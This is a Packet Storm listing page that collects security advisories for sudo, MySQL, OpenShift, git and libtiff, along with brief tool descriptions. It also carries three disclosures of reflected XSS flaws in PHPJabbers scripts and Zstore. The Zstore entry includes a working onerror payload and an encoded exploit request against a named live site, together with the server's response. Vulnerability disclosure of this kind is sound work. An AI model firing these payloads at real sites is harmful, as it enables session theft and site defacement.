Ubuntu Security Notice 5811-3 - USN-5811-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 14.04 ESM. Matthieu Barjole and Victor Cutillas discovered that Sudo incorrectly handled user-specified editors when using the sudoedit command. A local attacker that has permission to use the sudoedit command could possibly use this issue to edit arbitrary files.

==========================================================================  
Ubuntu Security Notice USN-5811-3  
January 30, 2023

sudo vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in Sudo.

Software Description:  
- sudo: Provide limited super user privileges to specific users

Details:

USN-5811-1 fixed a vulnerability in Sudo. This update provides  
the corresponding update for Ubuntu 14.04 ESM.

Original advisory details:

 Matthieu Barjole and Victor Cutillas discovered that Sudo incorrectly  
 handled user-specified editors when using the sudoedit command. A local  
 attacker that has permission to use the sudoedit command could possibly use  
 this issue to edit arbitrary files. (CVE-2023-22809)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 14.04 ESM:  
  sudo                            1.8.9p5-1ubuntu1.5+esm7  
  sudo-ldap                       1.8.9p5-1ubuntu1.5+esm7

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5811-3  
  https://ubuntu.com/security/notices/USN-5811-1  
  CVE-2023-22809

Ubuntu Security Notice USN-5811-3

This is a custom firmware written for the Proxmark3 device. It extends the currently available firmware.

Proxmark3 4.16191 Custom Firmware

Red Hat Security Advisory 2022-9096-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers. Issues addressed include bypass and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift support for Windows Containers 7.0.0 [security update]  
Advisory ID:       RHSA-2022:9096-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9096  
Issue date:        2023-01-30  
CVE Names:         CVE-2021-25749 CVE-2021-46848 CVE-2022-21698   
                   CVE-2022-27191 CVE-2022-35737   
=====================================================================

1. Summary:

The components for Red Hat OpenShift support for Windows Container 7.0.0  
are now  
available. This product release includes bug fixes and a moderate security  
update for the following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact  
of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a  
detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

2. Description:

Red Hat OpenShift support for Windows Containers allows you to deploy  
Windows container workloads running on Windows Server containers.

Security Fix(es):

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)  
* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)  
* kubelet: runAsNonRoot logic bypass for Windows containers  
(CVE-2021-25749)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

3. Solution:

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server  
2107261 - [WMCO] WMCO endpoints missing after WMCO restart in vSphere  
2127808 - CVE-2021-25749 kubelet: runAsNonRoot logic bypass for Windows containers

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-3509 - [WINC] Windows nodes name not matching hostname in GCP  
OCPBUGS-3573 - Check if Windows defender is running doesnt work  
OCPBUGS-4092 - Load balancer shows connectivity outage during Windows nodes upgrade  
OCPBUGS-5749 - Installation of WMCO in different namespace fails  
OCPBUGS-5803 - Windows nodes do not get drained (deconfigure) during the upgrade process  
WINC-713 - Implement WICD bootstrap command  
WINC-718 - WICD cleanup command (happy path)  
WINC-731 - Run WICD service on Windows instances  
WINC-732 - Nodes are bootstrapped with WICD bootstrap command  
WINC-737 - Move hybrid-overlay configuration to WICD  
WINC-738 - Kubelet service is described in services ConfigMap  
WINC-739 - Configure azure node manager through WICD  
WINC-740 - Configure kube-proxy through WICD  
WINC-815 - GCP support for Windows Server 2022  
WINC-830 - Use valid Windows Server 2022 image in platform=none job  
WINC-848 - Windows exporter is configured by WICD  
WINC-873 - Upgrade to go 1.19  
WINC-874 - Pick up openshift/kubernetes 1.25 rebase updates  
WINC-888 -  WMCO?s user data secret in GCP does not include tags  
WINC-927 - Stop dependent services before stopping a service in WICD  
WINC-941 - Use IMDSv1 to get hostname in AWS  
WINC-949 - Rename powershellVariablesInCommand  
WINC-957 - Update containerd to 1.6.15

6. References:

https://access.redhat.com/security/cve/CVE-2021-25749  
https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-27191  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9edMtzjgjWX9erEAQgLkg//Wq9uRShmkc1Il+iHrBVgoEd1vVN04ZvU  
kfyuY9ulUvXPMrgsMDa5IKzyw/qT3nEmtJTCU4fp2Fp2xPcLOl5q5RfbO4F/VLb4  
B7dNOf3osbzzl47J5IdyxUsvsCD5vhVvWUg7V2DK1FcNbAw52PAlyddnkDKBJY9B  
Beqht4UD4k7yUD1ts+w35kER8ZMZw1S8bSPig8IwOnC/6KeViOo+d1Um8s9M4Pc1  
3CvITEi7kVvcqoiGNOYKwLV2lP9qfGJqqC/prV4qq6atwxrjnx03Qx3/LWTNQjVq  
arFzm2zWGpDwBO0zKhKvyReLQ6P+MRtnKCVsuFzSSyrJ15Ua9mmAizNYKUZmPUz2  
LscLApQ/htY9Jzt7EMvflRgQ91qn07d71HZldTSs2T/3rnIJuE9dG6Gp9uLBfpmK  
qUxb7z4cNZpX1gkdSdq3rm9U0FALxjfs74pSknTjQSSA8RdJVGR9u+pfYny2Ep3r  
C4bIRPQ9JU84b7gmwb0mCmHiWVnJco4TybiQsG+AeJ+Tt2gLcLPLklRrsWk8cIKy  
OBaduDbeNz5RpvGlUGPHNlRhJncLepy6PhymKTNfpUvlGSvF9xV+FaRFwr6X8kqt  
kwpp8M16XQM9ljYjIofNGt1IMxuWO7bi5GMjA83dXlwzTyw2heWuyZYI9zfX3m8N  
m9ApnqX4I90=  
=3QC4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9096-01

OpenStego is a tool implemented in Java for generic steganography, with support for password-based encryption of the data. It supports plugins for various steganographic algorithms (currently, only Least Significant Bit algorithm is supported for images).

OpenStego Free Steganography Solution 0.8.6

Debian Linux Security Advisory 5332-1 - Multiple issues were found in Git, a distributed revision control system. An attacker may trigger remote code execution, cause local users into executing arbitrary commands, leak information from the local filesystem, and bypass restricted shell.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5332-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJanuary 29, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gitCVE ID         : CVE-2022-23521 CVE-2022-24765 CVE-2022-29187 CVE-2022-39253                  CVE-2022-39260 CVE-2022-41903Debian Bug     : 1014848 1022046 1029114Multiple issues were found in Git, a distributed revision control system.An attacker may trigger remote code execution, cause local users intoexecuting arbitrary commands, leak information from the local filesystem,and bypass restricted shell.This update includes two changes of behavior that may affect certain setup:  - It stops when directory traversal changes ownership from the current    user while looking for a top-level git directory, a user could make an    exception by using the new safe.directory configuration.  - The default of protocol.file.allow has been changed from "always" to    "user".For the stable distribution (bullseye), these problems have been fixed inversion 1:2.30.2-1+deb11u1.We recommend that you upgrade your git packages.For the detailed security status of git please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmPWoBQACgkQO1LKKgqv2VQ9Ugf/amidAHmXSaPDpk9Hs52ttiUPJ6uMJRYyJI/KQ3o5eoQfdzYmVT9ACsuKXxT7Xd5JqkHZMJyABeqm42JJgOiyV5GUx2ZrsQ3M5UE2HD2keWxaJmrkj6VlzkFsqHOynAgprllBmw3RfHkyjybQEG4dtmiLk5+gJZK0MYxAaKzyeNi7dnLEllYOf+Xidn3aSk8edTVqT80jdMIfBeOn1f/Zb+9kSHyVOezku1NfYES1dnA7RaOAkKmw/JkRHYnuxpdAfkb2K1z6LmDkLWpTQU7CbOPcPpWBWgkuD6tQmKjppx5MYuDZ+hW0y6aVEI1gHfi7qbZ3+b+nxEa9CTvap0d8QA===Vh4D-----END PGP SIGNATURE-----

Debian Security Advisory 5332-1

PHPJabbers Car Park Booking System version 2.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Car Park Booking System 2.0 - Reflected XSS                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'index' is vulnerable to XSS/index.php?controller=pjFront&action=pjActionSearch&session_id=c6e6onmv599a10vr76oei88jh2&theme=1&locale=1&hide=0&index=[XSS][-] Done

PHPJabbers Car Park Booking System 2.0 Cross Site Scripting

Ubuntu Security Notice 5823-3 - USN-5823-1 fixed vulnerabilities in MySQL. Unfortunately, 8.0.32 introduced a regression in MySQL Router preventing connections from PyMySQL. This update reverts most of the changes in MySQL Router to 8.0.31 until a proper fix can be found.

==========================================================================  
Ubuntu Security Notice USN-5823-3  
January 29, 2023

mysql-5.7, mysql-8.0 regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

USN 5823-1 introduced a regression in MySQL.

Software Description:  
- mysql-8.0: MySQL database

Details:

USN-5823-1 fixed vulnerabilities in MySQL. Unfortunately, 8.0.32 introduced  
a regression in MySQL Router preventing connections from PyMySQL. This  
update reverts most of the changes in MySQL Router to 8.0.31 until a proper  
fix can be found.

We apologize for the inconvenience.

Original advisory details:

  Multiple security issues were discovered in MySQL and this update includes  
  new upstream MySQL versions to fix these issues.  
   MySQL has been updated to 8.0.32 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and  
  Ubuntu 22.10. Ubuntu 18.04 LTS has been updated to MySQL 5.7.41.  
   In addition to security fixes, the updated packages contain bug fixes, new  
  features, and possibly incompatible changes.  
   Please see the following for more information:  
   https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.html  
  https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-32.html  
  https://www.oracle.com/security-alerts/cpujan2023.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   mysql-server-8.0                8.0.32-0ubuntu0.22.10.2

Ubuntu 22.04 LTS:  
   mysql-server-8.0                8.0.32-0ubuntu0.22.04.2

Ubuntu 20.04 LTS:  
   mysql-server-8.0                8.0.32-0ubuntu0.20.04.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5823-3  
   https://ubuntu.com/security/notices/USN-5823-1  
   https://launchpad.net/bugs/2003835

Package Information:  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.22.10.2  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.22.04.2  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5823-3

Zstore version 6.6.0 suffers from a cross site scripting vulnerability.

    ## Title: zstore-6.6.0 - XSS-Reflected## Development: nu11secur1ty## Date: 01.29.2023## Vendor: https://zippy.com.ua/## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4## Description:The value of manual insertion `point 1` is copied into the HTMLdocument as plain text between tags.The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted inthe manual insertion point 1.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Exploit:```GETGET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0aHTTP/2Host: store.zippy.com.uaCookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://store.zippy.com.ua/index.php?q=p:App/Pages/MainAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9```[+] Response:```HTTP/2 200 OKServer: nginxDate: Sun, 29 Jan 2023 07:27:55 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546Class \App\Pages\Chatgiflc<ahref="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><imgsrc=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>```## Proof and Exploit:[href](https://streamable.com/aadj5c)## Reference:[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)

Zstore 6.6.0 Cross Site Scripting

Debian Linux Security Advisory 5333-1 - Several buffer overflow, divide by zero or out of bounds read/write vulnerabilities were discovered in tiff, the Tag Image File Format (TIFF) library and tools, which may cause denial of service when processing a crafted TIFF image.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5333-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJanuary 29, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : tiffCVE ID         : CVE-2022-1354 CVE-2022-1355 CVE-2022-1622 CVE-2022-1623                  CVE-2022-2056 CVE-2022-2057 CVE-2022-2058 CVE-2022-2519                  CVE-2022-2520 CVE-2022-2521 CVE-2022-2867 CVE-2022-2868                  CVE-2022-2869 CVE-2022-2953 CVE-2022-3570 CVE-2022-3597                  CVE-2022-3599 CVE-2022-3627 CVE-2022-3636 CVE-2022-34526                 CVE-2022-48281Debian Bug     : 1011160 1014494 1022555 1024737 1029653Several buffer overflow, divide by zero or out of bounds read/writevulnerabilities were discovered in tiff, the Tag Image File Format (TIFF)library and tools, which may cause denial of service when processing acrafted TIFF image.For the stable distribution (bullseye), these problems have been fixed inversion 4.2.0-1+deb11u3.We recommend that you upgrade your tiff packages.For the detailed security status of tiff please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tiffFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmPWbCMACgkQO1LKKgqv2VSytwgAhwPmD658VKUyf76i4kD+dO2fioMClzNZNZgXz9CxWPn18j67dphNDQkxK3b/Vd9n/FMnmi7hApNdUtEXdorq0355UIT4tI6IMxuywEdAou4vCl83KXx7a6xRHgzap+e+fRma3TS3NvlrvnXm02RMvULEo/QVs2/5B/cxmaPDEFpKzwXoQwO87OzifK7W6LkH6GqhC/cgGoIFjR8n9EBVY6BBzgbardsrxVElspQNrfeKg1O5L7Y26ql9bp8YwMpEfSPxX69u/75xGiT3fQpMiGsLUEUAOrGynZH1jtyTPPzGDMd+VG1S8fQUvZ+ZLnm2nAHBx+1YaGZNBcW8ocY2jA===NMoP-----END PGP SIGNATURE-----

Debian Security Advisory 5333-1

PHPJabbers Event Ticketing System Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Event Ticketing System Script 1.0                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.php/preview.php?lid=[XSS]GET parameter 'lid' is vulnerable to XSS[-] Done

Source

Packet Storm